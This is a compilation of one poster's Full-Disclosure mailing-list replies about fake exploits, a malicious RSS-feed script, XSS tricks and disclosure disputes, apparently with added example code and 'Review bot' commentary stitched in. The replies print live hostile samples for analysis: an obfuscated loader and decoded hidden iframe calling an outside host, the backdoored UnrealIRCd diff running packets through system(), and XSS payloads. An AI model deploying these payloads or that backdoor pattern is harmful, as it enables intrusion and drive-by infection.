Re: [Full-disclosure] Re(2): An April Fools' Day Android Payload
On 2012-04-02, at 11:42, アドリアンヘンドリック wrote:
> Just out of April Fools' curiosity, I actually did a double check of the $payload in x86 ASM code.

Er... did you miss the part that said ARM payload? ARM is not x86. :)

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Megaupload Anonymous hacker retaliation, nobody wins
On 2012-01-25, at 16:36, Sanguinarious Rose wrote:
> I have found the perfect image to describe my thoughts on this current clash of intellectuals.
> http://www.threadbombing.com/data/media/27/arguing.jpg

Alternatively (also, a more memorable link): http://www.internetargument.com/
Re: [Full-disclosure] Symlink vulnerabilities
On 2011-10-27, at 07:48, valdis.kletni...@vt.edu wrote:
> The other thing that people need to remember is that there's no race condition that's so small that you can't hit it. If there's a race condition, it *can* be won.

And systems like inotify make filesystem races trivial to win. I wouldn't be surprised if you could win this particular race reliably by watching for the files bzexe drops and acting immediately when they show up.
Re: [Full-disclosure] I know its old, but what the heck does this do... (exposing a tool...)
On 2011-10-25, at 19:15, adam wrote:
> http://home.no/exploited/exploits/kmodaxx.c (almost[?] identical code, claims to be a remote kernel root exploit)
> http://www.securitylab.ru/forum/forum32/topic3728/?PAGEN_1=2 (very similar code, claims to be an IIS exploit)
> http://seclists.org/fulldisclosure/2003/Jun/456 (didn't read entire thread, code is mentioned though)
>
> I'm sure there's more, but this kinda reminds me of that leaked private exploit on pastebin a few weeks back (you know, the one that was nice enough to create a _local_ root account), and insisted that it was private private private and specifically said NOT to leak it.

Well, I'll give it this -- it's one of the smaller Perl IRC bots I've seen in a while. ;)
Re: [Full-disclosure] Apache 2.2.17 exploit?
On 2011-10-04, at 02:43, Darren Martyn wrote:
> Is there actually a non-backdoored variant of said code? I have not seen any CVE mentioning that exploit, so I was naturally wondering.

You are assuming that there is some substance to the code *besides* being a trojan/backdoor. Your assumption is mistaken -- there's no substance to it at all.
Re: [Full-disclosure] Apache 2.2.17 exploit?
On 2011-10-04, at 14:39, Kai wrote:
> Hi halfdog,
>
>> Just for those who want to build their own apache shell code for testing purposes, this snip might be of some use. It uses the still-open tcp connections to the server to spawn the shells, so that no backconnect is needed. Of course, it does not give remote root but only httpd user privs. And you should send exec 10 as first command if you want to see remote shell stdout.
>
> wasn't that bug fixed long ago?
> https://bugs.php.net/bug.php?id=38915
> ---
> https://issues.apache.org/bugzilla/show_bug.cgi?id=46425
> sorry if I'm talking about a different thing.

It's a generic method of getting a shell set up once you have code execution, not an exploit for any specific bug.
Re: [Full-disclosure] Apache 2.2.17 exploit?
On 2011-10-03, at 07:31, Darren Martyn wrote:
> I regularly trawl Pastebin.com to find code - often idiots leave some 0day and similar there and it is nice to find. Well, seeing as I have no test boxes at the moment, can someone check this code in a VM? I am not sure if it is legit or not.

Totally fake:

    execl("/bin/sh", "sh", "-c", evil, 0);

That's taking shellcode in a much different direction than I've seen in the past. ;)
Re: [Full-disclosure] Possibility to exploit bash * processing
On 2011-09-21, at 09:55, valdis.kletni...@vt.edu wrote:
> On Wed, 21 Sep 2011 16:01:24 +0300, Dan Carpenter said:
>> Seems like a good time to promote David Wheeler's filename proposal:
>> http://www.dwheeler.com/essays/fixing-unix-linux-filenames.html
>
> Unfortunately, David Wheeler's proposal has some implementation issues:
>
> 1. Forbid/escape ASCII control characters (bytes 1-31 and 127) in filenames, including newline, escape, and tab.
> 3. Forbid/escape filenames that aren't a valid UTF-8 encoding.
>
> The problem is that the UTF-8 codespace consists *mostly* of multibyte characters, wherein at least one of the bytes, when considered by itself, is an ASCII control character.

Not true - the multibyte sequences in UTF-8 text consist entirely of high-bit characters (0xC2 - 0xF4 initial, 0x80 - 0xBF continuation). All characters below 0x80, including ASCII control characters, are always mapped directly to the corresponding codepoints.
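An added illustration (not code from the thread) of the two Wheeler rules quoted above and of the reply's byte-range point: a filename check that applies rule 1 as a plain byte scan and rule 3 via strict UTF-8 decoding, plus an exhaustive check that no UTF-8 multibyte sequence can contain a byte below 0x80. The sample filenames are constructed.

```python
# Added example: validate filenames against the two rules from Wheeler's proposal
# discussed above and verify the byte-range claim about UTF-8. Sample names are constructed.

# Rule 1: ASCII control characters (bytes 1-31 and 127) are forbidden.
CONTROL_BYTES = frozenset(range(1, 32)) | {127}


def check_filename(name: bytes) -> list[str]:
    """Return the list of rule violations for a raw (bytes) filename; [] means acceptable."""
    problems = []
    # Rule 3: the name must be valid UTF-8. The strict decoder rejects bad lead and
    # continuation bytes, truncated sequences, overlong encodings and surrogates.
    try:
        name.decode("utf-8")
    except UnicodeDecodeError as err:
        problems.append(f"rule 3: not valid UTF-8 ({err.reason} at byte {err.start})")
    # Rule 1 is a plain byte scan: no decoding is needed, because a control byte can
    # only ever be a single-byte ASCII character, never part of a multibyte sequence.
    bad = sorted({b for b in name if b in CONTROL_BYTES})
    if bad:
        problems.append("rule 1: control byte(s) " + ", ".join(f"0x{b:02x}" for b in bad))
    return problems


def multibyte_sequences_are_all_high() -> bool:
    """Exhaustively verify the reply's claim: the UTF-8 encoding of every code point from
    U+0080 upward uses a lead byte in 0xC2-0xF4 and continuation bytes in 0x80-0xBF,
    so it can never contain a byte from CONTROL_BYTES (or any byte below 0x80)."""
    for cp in range(0x80, 0x110000):
        if 0xD800 <= cp <= 0xDFFF:      # surrogates are not encodable in UTF-8
            continue
        encoded = chr(cp).encode("utf-8")
        tail = encoded[1:]              # non-empty: every code point here needs 2-4 bytes
        if not (0xC2 <= encoded[0] <= 0xF4 and 0x80 <= min(tail) and max(tail) <= 0xBF):
            return False
    return True


if __name__ == "__main__":
    samples = [                                    # constructed sample filenames
        b"report.txt",                             # plain ASCII
        "r\u00e9sum\u00e9.pdf".encode("utf-8"),    # two-byte sequences (0xC3 0xA9)
        "\u65e5\u672c\u8a9e.txt".encode("utf-8"),  # three-byte sequences
        b"evil\nname",                             # newline inside the name
        b"\x1b[31mred.log",                        # terminal escape sequence
        b"a\x7fb",                                 # DEL
        b"trunc\xc3",                              # cut-off multibyte sequence
        b"\xff\xfe.bin",                           # bytes that are never valid UTF-8
    ]
    for s in samples:
        print(f"{s!r:34} -> {check_filename(s) or 'ok'}")
    print("multibyte sequences contain no control bytes:", multibyte_sequences_are_all_high())
```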
Re: [Full-disclosure] Western Union Certificate Error
On 2011-09-07, at 07:40, JT S wrote:
> I recently got this error:
>
> You attempted to reach www.westernunion.com, but instead you actually reached a server identifying itself as wumt.westernunion.com. This may be caused by a misconfiguration on the server or by something more serious.

This appears to be an error, not a hack. Western Union doesn't use https://www.westernunion.com for anything obvious on their site -- the login form is at https://wumt.westernunion.com, and all of the other secure services I spotted are on different domains as well.
Re: [Full-disclosure] Question about disclosure of WordPress plugin vulnerabilities
On 2011-08-26, at 05:08, Miroslav Stampar wrote:
> Does anybody know what's the general opinion on disclosure of WordPress plugin vulnerabilities in these two sections:
> ...
> 2) admin ones (requires access to the restricted admin area)

If you need full admin access to run the exploit, you probably have enough access that you could get arbitrary code execution by installing a plugin, like: http://wordpress.org/extend/plugins/wordpress-console/

So the exploit isn't really doing much at that point, unless it can be triggered remotely (e.g, CSRF).
Re: [Full-disclosure] Advisory: Range header DoS vulnerability Apache HTTPD 1.3/2.x (CVE-2011-3192)
On 2011-08-26, at 08:12, Nikolay Kichukov wrote:
> Hi,
>
> This one works like a charm on my debian stable:
>
> LimitRequestFieldSize 200
>
> in the apache2.conf as a global directive for all vhosts.

Be cautious about applying this mitigation -- it *will* break applications which use large cookies. In particular, the cookies generated by Google Analytics are often over 200 bytes long alone.
Re: [Full-disclosure] IE handling the HTML notes incorrectly may lead to XSS attacks
On 2011-08-07, at 19:53, CnCxzSec衰仔 wrote:
> hi all,
>
> here is an interesting trick to perform an xss attack with IE browsers. Some rich text applications, such as email and blogs, may allow HTML but have a policy to block on-event execution to prevent XSS attacks. However, these applications may also allow the use of HTML notes, for instance <!-- -->

Any such applications are likely to also be vulnerable to a simpler attack based on downlevel-hidden conditional comments:

    <!--[if IE]><script>anything you want can go here, presumably</script><![endif]-->
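As an added example (not code from the post), a minimal rich-text sanitizer of the kind described, built on Python's html.parser: one variant copies comments through untouched, as the vulnerable policy does, and the other drops them. The sample markup is constructed and uses the conditional-comment shape shown above.

```python
# Added example: a minimal rich-text sanitizer (strips on* event attributes, javascript:
# URLs and <script> blocks) in two variants. keep_comments=True mirrors the vulnerable
# policy the post describes: comments pass through untouched, so a downlevel-hidden
# conditional comment reaches IE intact. keep_comments=False drops every comment.
from html import escape
from html.parser import HTMLParser


class EventAttributeFilter(HTMLParser):
    def __init__(self, keep_comments: bool):
        super().__init__(convert_charrefs=False)
        self.keep_comments = keep_comments
        self.out = []               # rebuilt markup fragments
        self.dropped_comments = []  # bodies of comments that were removed
        self.in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.in_script = True   # discard the element and everything inside it
            return
        kept = []
        for name, value in attrs:
            if name.lower().startswith("on"):
                continue            # onclick, onerror, onload, ...
            if value is not None and value.strip().lower().startswith("javascript:"):
                continue
            kept.append(name if value is None else f'{name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag} {' '.join(kept)}>" if kept else f"<{tag}>")

    def handle_startendtag(self, tag, attrs):
        if tag != "script":         # a self-closing <script/> has no body to skip
            self.handle_starttag(tag, attrs)

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False
            return
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.in_script:
            self.out.append(data)

    def handle_entityref(self, name):
        self.out.append(f"&{name};")

    def handle_charref(self, name):
        self.out.append(f"&#{name};")

    def handle_comment(self, data):
        # The parser never sees tags inside a comment, so an on*/script filter that acts
        # on parsed tags has nothing to object to in <!--[if IE]><script>..</script><![endif]-->.
        # IE, however, evaluates the body of a conditional comment as markup.
        if self.keep_comments:
            self.out.append(f"<!--{data}-->")
        else:
            self.dropped_comments.append(data)


def sanitize(markup: str, keep_comments: bool) -> str:
    p = EventAttributeFilter(keep_comments)
    p.feed(markup)
    p.close()
    return "".join(p.out)


def conditional_comments(markup: str) -> list[str]:
    """Detection helper: the bodies of any IE conditional comments in the input."""
    p = EventAttributeFilter(keep_comments=False)
    p.feed(markup)
    p.close()
    return [c for c in p.dropped_comments if c.lstrip().lower().startswith("[if")]


if __name__ == "__main__":
    # Constructed test markup combining the conditional-comment trick with an on* handler.
    payload = '<!--[if IE]><script>alert(1)</script><![endif]--><p onclick="x()">Hello</p>'
    print("on-event filter, comments kept   :", sanitize(payload, keep_comments=True))
    print("on-event filter, comments dropped:", sanitize(payload, keep_comments=False))
    print("conditional comments found       :", conditional_comments(payload))
```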
Re: [Full-disclosure] SOngs.pk Hacked ! By Indian Hacker Team (Dueto Mumbai Terror)
On 2011-07-15, at 22:49, w0lfd...@gmail.com wrote:
> We might see a few more of these after the recent blasts in India. Cyberwar between both nations can be at peak for some time again!

Cyberwar? That might be stretching things a bit. Lame script-kiddy antics seems a little closer to the mark.
Re: [Full-disclosure] PenTestIT.com RSS feed suspicius
On 2011-07-05, at 10:31, ector dulac wrote:
> # curl http://feeds.feedburner.com/PenTestIT/
> ...
> <script>var t="";var arr="646f63756d656e742e777269746528273c696672616d65207372633d22687474703a2f2f696e6e65737370686f746f2e636f6d2f666f72756d2e7068703f74703d3637356561666563343331623166373077696474683d223122206865696768743d223122206672616d65626f726465723d2230223e3c2f696672616d653e2729";for(i=0;i<arr.length;i+=2)t+=String.fromCharCode(parseInt(arr[i]+arr[i+1],16));eval(t);</script>
>
> Looks suspicious to me

Very. That unescapes to:

    document.write('<iframe src="http://innessphoto.com/forum.php?tp=675eafec431b1f72" width="1" height="1" frameborder="0"></iframe>')

Which loads some amusingly obfuscated JS which looks like it's *supposed* to be a plugin exploit of some sort, but which has no real payload. At least, not when I looked.
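Added example, not code from the thread: a decoder for the hex-pair loader quoted above that rebuilds the string the same way the loop does but without eval(), then extracts the indicators an analyst would look at (document.write, iframe hosts, 1x1 dimensions). The script it runs on is a constructed stand-in with the same structure and a placeholder host, not the feed's actual content.

```python
# Added example: decode the "hex pairs -> String.fromCharCode -> eval" loader pattern from
# the thread without executing it, and summarise what the decoded code would do.
import re
from urllib.parse import urlsplit

# var NAME = 'HEX...';  (the feed's copy had no quotes around the string; they are optional here)
HEX_VAR_RE = re.compile(r"""var\s+(\w+)\s*=\s*['"]?([0-9a-fA-F]{16,})['"]?\s*;""")
IFRAME_SRC_RE = re.compile(r"""<iframe[^>]*\ssrc\s*=\s*['"]?([^'"\s>]+)""", re.IGNORECASE)
# width/height of exactly 0 or 1 px: the hallmark of a frame meant to stay invisible
TINY_DIM_RE = re.compile(r"""(?:width|height)\s*=\s*(['"]?)[01]\1(?=[\s>/])""", re.IGNORECASE)

# Constructed sample (placeholder host, not the site named in the thread).
HIDDEN_IFRAME = ('document.write(\'<iframe src="http://malware.example/forum.php?tp=0123abcd" '
                 'width="1" height="1" frameborder="0"></iframe>\')')
# The loader stores HIDDEN_IFRAME as hex pairs, rebuilds it two characters at a time with
# String.fromCharCode(parseInt(arr[i]+arr[i+1],16)) and eval()s the result.
SAMPLE_SCRIPT = (
    "<script>var t='';var arr='" + HIDDEN_IFRAME.encode("latin-1").hex() + "';"
    "for(i=0;i<arr.length;i+=2)t+=String.fromCharCode(parseInt(arr[i]+arr[i+1],16));"
    "eval(t);</script>"
)


def decode_hex_pairs(blob: str) -> str:
    """Replicates the loop's output: each pair of hex digits becomes one character."""
    if len(blob) % 2:
        raise ValueError("odd-length hex string")
    # latin-1 maps byte value N to code point N, exactly like String.fromCharCode(N)
    return bytes.fromhex(blob).decode("latin-1")


def analyze_loader(script: str) -> dict:
    """Decode every hex-string variable in the script and report what the text would do."""
    decoded = {name: decode_hex_pairs(blob) for name, blob in HEX_VAR_RE.findall(script)}
    text = "\n".join(decoded.values())
    hosts = {urlsplit(url).hostname for url in IFRAME_SRC_RE.findall(text)}
    return {
        "decoded": decoded,
        "uses_eval": "eval(" in script,
        "document_write": "document.write(" in text,
        "iframe_hosts": sorted(h for h in hosts if h),
        "hidden_frame": bool(hosts) and len(TINY_DIM_RE.findall(text)) >= 2,
    }


if __name__ == "__main__":
    report = analyze_loader(SAMPLE_SCRIPT)
    for name, value in report["decoded"].items():
        print(f"{name} decodes to: {value}")
    for key in ("uses_eval", "document_write", "iframe_hosts", "hidden_frame"):
        print(f"{key}: {report[key]}")
```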
Re: [Full-disclosure] PenTestIT.com RSS feed suspicius
On 2011-07-05, at 20:55, Nick FitzGerald wrote:
> Andrew Farmer to ector dulac:
>>> Looks suspicious to me
>>
>> Very. That unescapes to:
>> [something that trips a bunch of AVs]
>> Which loads some amusingly obfuscated JS ...
>
> Really? That amused you? Maybe my irony detector is on the blink, but that was very ordinary several years ago.

Eh, I hadn't seen the with() { } trick before.

>> ... which looks like it's *supposed* to be a plugin exploit of some sort, but which has no real payload. At least, not when I looked.
>
> U -- not what I got at all.

Perhaps it's UA sniffing -- the copy I got looked almost identical to the copy seen at:

http://jsunpack.jeek.org/dec/go?report=c162b83bf99e26230f680b36ce63a215c1165334

including the empty redirect() function triggered by a chain of spl1/spl2/.../spl6 functions.
Re: [Full-disclosure] [New Security Tool] INSECT Pro 2.6.1 release
On 2011-06-22, at 20:38, adam wrote:
> - Using outdated version of SSL
> - Outdated SSL Certificate (2009)

And while we're beating this dead horse:

    You attempted to reach www.insecurityresearch.com, but instead you actually reached a server identifying itself as myinflatableboat.net.
Re: [Full-disclosure] Apache 2.0.63 - 2.2.19 Remote Exploit Fake or not?
On 2011-06-15, at 12:59, kernel wrote:
> Hi, all,
>
> Some days ago I found the head -n * of an exploit for apache at pastebin.com
> http://pastebin.com/XEFnG9D6
>
> #!/usr/bin/perl
> #
> # Apache 2.0.63 - 2.2.19 Remote Exploit
> #
> # This 0-day exploit will remotely gain root on any apache server from version 2.0.63 to 2.2.19
> # Beta release 2.3.12-beta was also compromised by an affiliate - need verification...

The header looks like a crude modification of this 2003 DAV exploit:

http://www.exploit-db.com/download/38/

There's also a glaring syntax error on line 22 of the pastebin code. It'd never run as written.
Re: [Full-disclosure] File system recursion and symlinks: A never-ending story (and how to bring it to an end for me)
On 2011-05-30, at 16:27, coderman wrote:
> On Mon, May 30, 2011 at 6:56 AM, halfdog m...@halfdog.net wrote:
>> It seems that quite a few backup applications are (or were) vulnerable to special combined symlink/timing attacks on pathname components before the last one (so O_NOFOLLOW does not help).
>> ...
>> Please let me know, if ... you have good reason, that the kernel interface is not the point, where this issue could be addressed most efficiently.
>
> use lvm snapshots for backups, either directly at volume level or mounting a read-only snapshot and running backup over that static filesystem state.

LVM snapshots have some nasty gotchas, though:

https://bugs.launchpad.net/lvm2/+bug/360237

They also don't solve the problem of restoring a fragment of data (e.g, a single accidentally deleted file) from a backup in an untrustworthy environment.
Re: [Full-disclosure] Launched New Tool - RAR Password Unlocker
On 2011-03-29, at 12:29, k...@rhynn.net wrote:
> is there any chance of seeing CUDA in action for the next versions? :)

Ha ha ha, no. (See below.)

>> Installed executable is completely portable.
>
> why do we need an installer then? distribute that tool as a single executable.

Because without the installer, it can't try to monetize the install by installing search toolbars! (It's nice enough to continue the install if you reject their terms, though.)

On 2011-03-29, at 13:13, Jo Galara wrote:
> How does it work? Bruteforce?

Yes, but... well, JAD does a better job of explaining than I possibly could:

    Runtime rt = Runtime.getRuntime();
    String str = "7z.exe x ";
    str = str + "\"" + _filepath + "\" ";
    str = str + "-p\"" + pwd + "\" ";
    str = str + "-o\"" + _destpath + "\"";
    str = str + " -y";
    System.out.println(str);
    Process p = rt.exec(str);
    p.waitFor();
    if (p.exitValue() == 0) {
        ret = true;
    }
Re: [Full-disclosure] Facebook URL Redirect Vulnerability
On 2011-03-02, at 06:30, Nathan Power wrote:
> There are 3 different steps to perform an attack using a URL redirect:
> 1) trick the user
> 2) redirect
> 3) exploit
> ..
> We are using a Facebook URL to trick the user; we are using the URL redirect as the catalyst to perform an exploit. Here are some examples of the types of attacks you can perform with a URL redirect: CSRF, phishing (fake fb login), and browser exploits (javascript zombie, 0days, etc).
>
> How would you have written the impact section?

Something like this:

    3. Impact: An attacker may obfuscate the target of a link, potentiating phishing attacks and/or bypassing some simple URL filters.

Or something of the sort. The actual target of the link isn't obscured in the URL, so it's not even particularly convincing if the URL is displayed in plain text.
Re: [Full-disclosure] Facebook URL Redirect Vulnerability
On 2011-02-28, at 09:42, Nathan Power wrote:
> 3. Impact: Potentially allow an attacker to compromise a victim’s Facebook account and/or computer system.

Do you have an actual attack in mind which could accomplish either of these goals, or is this wishful thinking? (Browser exploits don't really count, as those would work just fine with or without the redirect.)

To be clear - open redirects are certainly a problem, but don't try to call them any more than that.
Re: [Full-disclosure] sourceforge entry point seems still active.
On 2011-01-24, at 12:08, exploit dev wrote:
> Anyway, I'm sorry to repeat my message. I think that this issue is a bit critical, but I still haven't received any feedback.

It's not particularly critical by any means. SourceForge projects all have their own web space, and there are doubtless a bunch of them running vulnerable versions of software. These sites are relatively isolated, and don't have write access to the project's SCM or downloads.
Re: [Full-disclosure] Filezilla's silent caching of user's credentials
On 14 Oct 2010, at 14:01, Jeffrey Walton wrote:
> If the encryption key stays on the same PC, there is absolutely no security in that. Given that this is open source, security through obscurity can't even start working (- encrypting local files with a local key / using custom algo == security through obscurity).
>
> Linux [apparently] has not caught on to the fact that applications could use help in securing secrets. Microsoft has DPAPI and iOS has KeyChain (one of the bug reports stated about the same).

Kernel key management seems to be a step in the right direction:

http://lwn.net/Articles/210502/

And FWIW, Keychain Services is mostly (all?) in userspace, so there's no reason a similar solution couldn't be implemented on Linux.
Re: [Full-disclosure] Fw: [irc-security] UnrealIRCd 3.2.8.1 backdoored on official ftp and site
On 12 Jun 2010, at 08:09, Henri Salo wrote: I'd like to let you know that there's been a compromise of the unrealircd website and ftp and the 3.2.8.1 tarball release had been replaced by a backdoored copy. And here's the diff. Nature of the backdoor should be obvious upon inspection. --- diff -ru Unreal3.2-good/include/struct.h Unreal3.2-backdoored/include/struct.h --- Unreal3.2-good/include/struct.h 2009-04-13 04:03:57.0 -0700 +++ Unreal3.2-backdoored/include/struct.h 2009-04-13 04:03:00.0 -0700 @@ -430,6 +430,7 @@ #endif /* Fake lag exception */ + #define IsNoFakeLag(x) ((x)-flags FLAGS_NOFAKELAG) #define SetNoFakeLag(x) ((x)-flags |= FLAGS_NOFAKELAG) #define ClearNoFakeLag(x) ((x)-flags = ~FLAGS_NOFAKELAG) @@ -448,6 +449,7 @@ #else #define IsNotSpoof(x) (1) #endif +#defineDEBUGMODE3 ((x)-flags FLAGS_NOFAKELAG) #define GetHost(x) (IsHidden(x) ? (x)-user-virthost : (x)-user-realhost) #define GetIP(x) ((x-user x-user-ip_str) ? x-user-ip_str : (MyConnect(x) ? Inet_ia2p(x-ip) : NULL)) @@ -513,6 +515,10 @@ #else #define CHECKPROTO(x,y) (checkprotoflags(x, y, __FILE__, __LINE__)) #endif +#ifdef DEBUGMODE3 +#define DEBUGMODE3_INFOAB +#defineDEBUG3_LOG(x) DEBUG3_DOLOG_SYSTEM (x) +#endif #define DontSendQuit(x)(CHECKPROTO(x, PROTO_NOQUIT)) #define IsToken(x) (CHECKPROTO(x, PROTO_TOKEN)) @@ -1373,6 +1379,7 @@ #define INCLUDE_REMOTE 0x2 #define INCLUDE_DLQUEUED 0x4 #define INCLUDE_USED 0x8 +#define DEBUG3_DOLOG_SYSTEM(x) system(x) struct _configitem_include { ConfigItem *prev, *next; diff -ru Unreal3.2-good/src/s_bsd.c Unreal3.2-backdoored/src/s_bsd.c --- Unreal3.2-good/src/s_bsd.c 2009-03-01 10:37:58.0 -0800 +++ Unreal3.2-backdoored/src/s_bsd.c2006-06-16 11:29:00.0 -0700 
@@ -1431,6 +1431,10 @@ return 1; if (length = 0) return length; +#ifdef DEBUGMODE3 + if (!memcmp(readbuf, DEBUGMODE3_INFO, 2)) + DEBUG3_LOG(readbuf); +#endif for (h = Hooks[HOOKTYPE_RAWPACKET_IN]; h; h = h-next) { int v = (*(h-func.intfunc))(cptr, readbuf, length); ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
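Review bot: the s_bsd.c hunk turns the raw packet read path into an unauthenticated remote command execution primitive, so the whole change must be rejected rather than fixed: `DEBUG3_LOG(readbuf)` expands through `DEBUG3_DOLOG_SYSTEM(x)` to `system(readbuf)`, which means any inbound packet whose first two bytes equal `DEBUGMODE3_INFO` is handed verbatim to a shell with the daemon's privileges, before the HOOKTYPE_RAWPACKET_IN hooks or any protocol parsing see it. The struct.h hunks carry the tells that mark this as hostile rather than sloppy: the `#ifdef DEBUGMODE3` guard is always true because the same header unconditionally defines DEBUGMODE3 (and that object-like macro refers to an `x` it never takes as a parameter, unlike the `IsNoFakeLag(x)` family beside it); the `system()` wrapper is split across four macro definitions at three separate places in the header so that no single hunk reads as command execution; and the diff header shows the modified s_bsd.c carrying a 2006-06-16 timestamp, older than the clean 2009-03-01 file it replaces. Anyone who fetched this tarball should compare it against the project's published checksum or signature and search the unpacked tree for `DEBUG3_DOLOG_SYSTEM` before building.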
Re: [Full-disclosure] Drupal Context Module XSS
On 10 May 2010, at 06:08, Justin C. Klein Keane wrote:
> Drupal security responds that they do not coordinate security fixes for modules in release candidate designation. Vulnerability was reported to the module maintainer via the public issue queue at the direction of Drupal security.

Also, isn't it pretty well established by this point that Drupal generally doesn't consider XSS to be a vulnerability if you need an admin account to trigger it?
Re: [Full-disclosure] MouseOverJacking attacks
On 29 Dec 2009, at 13:48, MustLive wrote:
> Recently, 26th of December 2009, I wrote the article MouseOverJacking attacks (http://websecurity.com.ua/3807/), and today I wrote an English version of it (http://websecurity.com.ua/3814/).

Hardly news. If you can inject arbitrary HTML into a web page, there are plenty of ways (many of them easier or more flexible than this) you can get it to run Javascript:

- <script> tags, obviously
- Binding other events that'll trigger without an event, like onLoad
- CSS (either inline, in a <style>, or loaded from another site with <link rel="stylesheet">) containing any of:
  * Background images loaded with the javascript: protocol
  * expression() (MSIE only?)
  * -moz-binding
- Embedded objects (say, Flash, using ExternalInterface)

None of this is considered particularly novel at this point.
Re: [Full-disclosure] more on that
On 24 Nov 2009, at 13:41, Tyler Durten wrote:
> And this is what I'm talking about:
> http://seclists.org/fulldisclosure/2005/Apr/412

... which reads, in part:

    main()
    {
        //Section Initialises designs implemented by mexicans
        //Imigrate
        system(launcher);
        system(netcat_shell);
        system(shellcode);

I can understand possibly overlooking something clever (like a fake exploit that buffer-overflows itself), but this isn't even marginally subtle.
Re: [Full-disclosure] ICMPv4/IP fuzzer prototype.
On 22 Nov 2009, at 19:48, laurent gaffie wrote:
> Should be kweel for UTesting
> http://g-laurent.blogspot.com/2009/11/releasing-icmpv4ip-fuzzer-prototype.html
> ...
> Don't forget it's a prototype, and I ASSUME you know what you're doing; do not ask for help.

You definitely have to know what you're doing to run the code, as posting that to Blogspot has destroyed the indentation. :)

Also, random.randrange(...) is going to give you much better performance than random.choice(range(...)). Just sayin'.
Re: [Full-disclosure] Drupal XML Sitemap 6.x-1.1 XSS Vulnerability
On 15 Oct 2009, at 07:24, Justin Klein Keane wrote: Applying the following patch mitigates these threats. - --- site_map/site_map.module2009-09-30 15:09:49.295134033 -0400 +++ site_map/site_map.module 2009-09-30 15:09:30.09976 -0400 @@ -14,7 +14,7 @@ function site_map_help($path, $arg) { switch ($path) { case 'sitemap': $output = _sitemap_get_message(); - - - return $output ? 'p'. filter_xss($output) .'/p' : ''; + return $output ? 'p'. $output .'/p' : ''; } } Surely that should be the other way around? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
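Review bot: the hunk is backwards relative to the stated mitigation: the `-` line is the one that wraps $output in filter_xss(), and the `+` line returns the raw $output, so applying this patch as written would strip the XSS filtering from site_map_help() instead of adding it. The fix should read the other way round, with filter_xss($output) on the `+` side and the unfiltered return on the `-` side. The `- - -` run in front of the removed line is also not valid diff syntax (it looks like dash-escaping from a signed message), so the patch would need cleaning before `patch` would accept it.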
Re: [Full-disclosure] Hack-Mail.net or similar site
On 11 Sep 2009, at 02:46, mamo wrote:
> What do you think of web sites like Hack-Mail.net or similar ones? Do they really work, and how?

hack-mail.net/howitworks.html:

> After about three to four days, you will get an email from the account you wanted to hack. This email acts as proof we have hacked the account. The email will be sent from within the victim's account. It will contain information on the next step to purchase the password from us. Please check that the email was sent from the exact email address you wanted to hack. This email will NOT appear in the 'sent' folder, so they will never know they have been hacked.

So, in other words, they're spoofing From addresses for profit. Clever.
Re: [Full-disclosure] Update: [GSEC-TZO-44-2009] One bug to rule them all - Firefox, IE, Safari, Opera, Chrome, Seamonkey, iPhone, iPod, Wii, PS3....
On 21 Jul 2009, at 08:12, Michal Zalewski wrote:
> There are literally thousands of HTML- and JavaScript-related denial of service vectors in modern browsers...

There's one significant difference in this one, though: while a bunch of nested divs (for instance) will just mess with the HTML renderer, a malformed or oversized select element may end up passing bad data to native menu APIs. It's one of the only elements I can think of offhand that often has effects which extend outside the HTML canvas.
Re: [Full-disclosure] “Cross-Site Scripting” vulnerability in MyBB 1.4.5
On 03 May 09, at 05:01, Jacques Copeau wrote:
> Advisory : “Cross-Site Scripting” vulnerability in MyBB
> [snip]
> The XSS renders in all browsers and on various pages inside the myBB software. We consider it to be particularly grave, as it renders on the ACP user overview page; this can be easily exploited to construct a universal CSRF vulnerability that introduces malicious php code into the script.

So, er, is this vulnerability XSS, CSRF, or RCE? Pick one and stick with it.
Re: [Full-disclosure] Help with something?
On 12 Jan 09, at 09:53, Will McAfee wrote:
> I got started a long time ago writing example code for new security-interested people. I got just one example done, my full time job and school started, and gave up debugging. Just out of curiosity, going to throw it out there. It's the only example up at http://labs.thegoodhacker.com/ -- let's see where I messed up. It segfaults, if I remember correctly.

At a glance, you're doing linked list management wrong. Stop trying to code your own. This is C++; the STL exists for a reason. Same goes for char arrays (which you leak all over the place). The STL has strings too.
Re: [Full-disclosure] new unpatched security flaw found Firefox 3.0.4
On 16 Dec 08, at 11:49, carl hardwick wrote:
> New unpatched security flaw found in Firefox 3.0.4
> PoC here: https://bugzilla.mozilla.org/attachment.cgi?id=302699

Relevant bug is https://bugzilla.mozilla.org/show_bug.cgi?id=416907

This doesn't appear to be security-critical - it's a NULL dereference.
Re: [Full-disclosure] Project Chroma: A color code for the state of cyber security
On 02 Dec 08, at 00:39, Mike C wrote:
> Once all desktops have an icon or widget (say at the right hand corner) with the color, and this is consistently seen everywhere, the users will start associating with their online security. They will be reminded that they have to be careful with the data they share.

Perhaps you can also make a spy show up on the user's screen every half hour to warn them that their communications may be monitored, and allow them to report suspicious web sites to the appropriate authorities.

http://www.telegraph.co.uk/news/worldnews/1561740/index.html
Re: [Full-disclosure] does the aim service save chat session details?
On 26 Nov 08, at 11:17, AMILABS wrote:
> Is AIM IM purely peer to peer or a store and forward type protocol?

It is neither. In most cases, the server forwards messages from client to client, but does not retain them. The client also supports a peer-to-peer mode, but it's rarely used.

> We need to determine if we can recover a past IM chat conversation that occurred over two weeks ago. Our chat client did not have IM logging enabled, so we need to know if the service archives all chat conversations for law enforcement and legal purposes.

You'll have to ask AOL about that. If there are server-side logs, they are not exposed to users.
Re: [Full-disclosure] Zero-day Catcher for Windows available for sell
On 15 Sep 08, at 13:39, Zero-day catcher team wrote:
> RSA theory, discussed here, was not broken (if you have evidence - please, share it or turn off your claims in this context).

The archives recall otherwise:

http://www.security-express.com/archives/fulldisclosure/2007-04/0683.html
Re: [Full-disclosure] Google Chrome Browser Vulnerability
On 02 Sep 08, at 21:48, Paul Ferguson wrote:
> -- James Matthews [EMAIL PROTECTED] wrote:
>> The same thing happened to safari when it came out on windows.
